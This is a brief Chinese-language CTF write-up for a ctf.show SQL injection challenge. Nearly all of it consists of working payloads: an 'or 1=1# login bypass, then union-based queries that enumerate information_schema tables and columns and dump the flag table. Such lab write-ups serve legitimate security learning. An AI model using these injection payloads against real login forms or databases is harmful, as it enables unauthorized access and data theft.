感谢ctf show平台提供题目
输入万能密码,提示登录成功。
admin
'or 1=1#
1、查询回显位置。
1' or 1=1 union select 1,2,3 #
2、取表名
1' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #
3、取字段名
1' or 1=1 union select 1, group_concat(column_name),3 from information_schema.columns where table_name='flag'#
4、 取数据
1'or 1=1 union select 1,flag,3 from flag#
原创文章不易,点个赞再走吧。